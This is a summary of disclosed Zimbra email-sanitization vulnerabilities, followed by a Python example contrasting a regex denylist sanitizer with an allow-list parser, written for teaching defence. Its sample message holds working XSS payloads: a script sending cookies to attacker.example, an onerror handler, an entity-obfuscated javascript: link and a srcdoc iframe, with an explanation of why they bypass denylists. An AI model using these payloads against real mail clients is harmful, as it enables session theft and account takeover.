Security researchers have disclosed multiple vulnerabilities in the Zimbra email collaboration suite. The flaws could be exploited to compromise a victim's email account simply by sending them a crafted message and, when the server is hosted on cloud infrastructure, escalated to a full takeover of the mail server. Fixes have been released in versions 8.8.15 Patch 23 and 9.0.0 Patch 16.0. The root cause is that all three Zimbra web clients (an Ajax-based desktop client, a static HTML client, and a mobile-optimized client) rely on the server to sanitize the HTML content of incoming emails, so a weakness in that single server-side sanitizer affects every client.
Source: https://thehackernews.com/2021/07/new-bug-could-let-attackers-hijack.html
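To show what "server-side sanitization of incoming HTML email" has to get right, the following added example (not Zimbra's code, and the payloads are generic rather than the ones from the Zimbra advisory) runs one constructed malicious message through two sanitizers: a naive denylist built from regexes, and an allow-list that rebuilds the document with a real HTML parser. The sample message, the tag allow-list and the function names are all assumptions made for this illustration.

```python
"""Server-side HTML email sanitisation: denylist regexes beside an allow-list
parser, both run over the same constructed malicious message.

Added example, not Zimbra's code; the bypass payloads are generic textbook
ones, not those from the Zimbra advisory."""
import html
import re
from html.parser import HTMLParser

# Constructed sample body of an incoming email (not a real captured message).
MALICIOUS_EMAIL_HTML = """<p>Hi, <b>please</b> review the attached invoice.</p>
<script>fetch('https://attacker.example/?c='+document.cookie)</script>
<img src="https://cdn.example/logo.png" onerror="alert(1)">
<a href="java&#x09;script:alert(document.domain)">Open invoice</a>
<iframe srcdoc="&lt;script&gt;alert(2)&lt;/script&gt;"></iframe>"""


def denylist_sanitize(markup: str) -> str:
    """Naive denylist: strip script elements, on* handlers and javascript: URLs.

    Anything the regexes do not anticipate passes through verbatim: the
    entity-encoded tab inside "java&#x09;script:" and the srcdoc attribute
    (whose content is entity-encoded) both survive and still execute in a browser."""
    markup = re.sub(r"<script\b.*?</script\s*>", "", markup, flags=re.I | re.S)
    markup = re.sub(r"\son\w+\s*=\s*(\"[^\"]*\"|'[^']*'|\S+)", "", markup, flags=re.I)
    markup = re.sub(r"javascript:", "", markup, flags=re.I)
    return markup


# Assumed allow-list for a mail client; a real product would carry a longer one.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "br", "a", "img", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
VOID_TAGS = {"br", "img"}
# Elements whose text content must be discarded, not just the tag itself.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "template", "svg", "math"}
SAFE_SCHEMES = {"http", "https", "mailto"}
_CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")


def safe_url(value: str) -> bool:
    """Browsers drop ASCII control/whitespace characters from a URL before parsing
    its scheme, so normalise the same way before deciding whether to keep it."""
    normalised = _CONTROL_CHARS.sub("", value).lower()
    head = normalised.split(":", 1)[0]
    if ":" not in normalised or any(c in head for c in "/?#"):
        return True  # relative URL, no scheme at all
    return head in SAFE_SCHEMES


class AllowListSanitizer(HTMLParser):
    """Rebuild the document from scratch: only allow-listed tags and attributes are
    emitted, URL attributes are scheme-checked after entity decoding, and all text
    is re-escaped on output."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # allowed non-void tags awaiting their close tag
        self.drop_depth = 0   # > 0 while inside an element whose content is discarded

    def handle_starttag(self, tag, attrs):
        if self.drop_depth or tag in DROP_CONTENT_TAGS:
            if tag in DROP_CONTENT_TAGS:
                self.drop_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag is dropped; its text content is kept (escaped)
        kept = []
        for name, value in attrs:  # HTMLParser has already decoded entities here
            name, value = name.lower(), value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.drop_depth:
            if tag in DROP_CONTENT_TAGS:
                self.drop_depth -= 1
            return
        if tag in self.open_tags:
            # Close everything opened after it too, so the output stays well-formed.
            while self.open_tags:
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        self.close()
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def allowlist_sanitize(markup: str) -> str:
    parser = AllowListSanitizer()
    parser.feed(markup)
    return parser.result()


if __name__ == "__main__":
    print("denylist:\n" + denylist_sanitize(MALICIOUS_EMAIL_HTML))
    print("allow-list:\n" + allowlist_sanitize(MALICIOUS_EMAIL_HTML))
```

The denylist output still carries the `java&#x09;script:` link and the `srcdoc` iframe, because the regexes see the encoded text while the browser sees the decoded one. The allow-list version never has that problem: it decides on the decoded attribute value, emits only what it recognises, and the `<a>` survives without its `href` rather than with a dangerous one.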

